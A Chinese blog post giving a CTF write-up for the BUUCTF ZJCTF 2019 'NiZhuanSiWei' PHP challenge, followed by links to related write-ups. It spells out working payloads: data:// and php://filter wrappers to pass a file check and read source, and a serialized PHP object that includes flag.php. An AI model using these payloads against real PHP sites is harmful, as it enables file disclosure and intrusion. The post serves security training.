BUUCTF [ZJCTF 2019]NiZhuanSiWei1

最新推荐文章于 2023-07-23 15:51:55 发布
最新推荐文章于 2023-07-23 15:51:55 发布
阅读量147 收藏
点赞数
分类专栏: php 文章标签: java servlet 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73995922/article/details/128316575
版权

进入靶场 查看源码

我们需要用get方法上传三个参数 text,file,password

首先text不能为空,file_get_contents($text,'r')==="welcome to the zjctf",从text中读取数据需要等于welcome to the zjctf。这里需要用到伪协议data://

构建第一个payload?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

或者?text=data://text/plain,welcome to the zjctf

第二个file,由于有正则匹配,我们不能直接查看flag.php,如果直接查看,我们就进入不了password反序列化,源码提示我们useless

用php://filter查看useless中的内容

第二个payload?file=php://filter/read=convert.base64-encode/resource=useless.php

得到一段base64编码

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

解码后发现是源码后,我们将$file赋值为flag.php再进行反序列化

 得到反序列化后结果O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  

得到最终payload?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源码后发现flag

知识点

php伪协议的运用

data:// 

1.data://text/plain,

2.data://text/plain;base64,

3.php://filter/read=convert.base64-encode/resource=

 

XXX_WEB
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化
oZuoShen123的博客
10-09 833
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "".file_get_contents($text,'r').""; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file);
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
魔术方法总结
梦里不知身是客
12-26 9838
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 531
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,
[ZJCTF 2019]NiZhuanSiWei 1学习笔记
weixin_45869407的博客
10-12 1345
刚刚做了一下PHP的代码审计,原以为自己能够做出来,果然还是练习不够,看到text就以为直接传参就OK了,结果试了半天不行,看大佬writeup才发现原来要通过PHP伪协议来传参。 首先看到的是text的参数,它使用了file_get_contents()函数,说明就需要传入文件类型的数据,但text是GET,所以这里就要使用伪协议data。 这里对伪协议的描述挺好的 可以从表上看出,data有4种方式,这里我使用/?text=data://text/plain;base64,d2VsY29tZSB0b
[极客大挑战 2019]PHP&[ZJCTF 2019]NiZhuanSiWei
weixin_46133275的博客
07-23 256
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 371
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1265
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1
Zero_Adam的博客
02-07 225
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1 水文,给自己做点记录 这个简单,但是我没做出来,,辣鸡! 就是一个简单的伪协议的应用, 源码自己去看 没有做出来的原因 想PHP伪协议,没有想全 对文件包含不够敏感 就做到这一步,主要是useless.php我没用到啊,里面的flag在什么变量里面我也不知道,里面有什么类我也不清楚。。。 不行,看WP了,, --------------------------------------------------分割线-----------
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3151
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】web之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
[ZJCTF 2019]NiZhuanSiWei BUUCTF
wuyaowangchuan的博客
12-04 279
进入环境 知识点 1:data伪协议写入文件 2:php:// php://filter用于读取源码 php://input用于执行php代码 伪协议利用解释:https://www.cnblogs.com/-chenxs/p/11571903.html <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_conte
BUUCTF_ZJCTF2019_NiZhuanSiWei
qq_45628145的博客
05-03 603
NiZhuanSiWei 进入题目,直接给出了php源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ ...
BUUCTF [ZJCTF 2019]NiZhuanSiWei
m0_49025459的博客
05-02 518
进去就是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>&l
buuctf-ZJCTF,不过如此
m0_62094846的博客
11-21 2662
这是文件包含 ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php 前面一段是使用data://伪协议,后面的是读取文件信息 解码得到 这是关于preg_replace的内容 <?php $id = $_GET['id']; $_SESSION['id'] = $id; function...
BUUCTF-[SUCTF 2019]EasySQL1
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值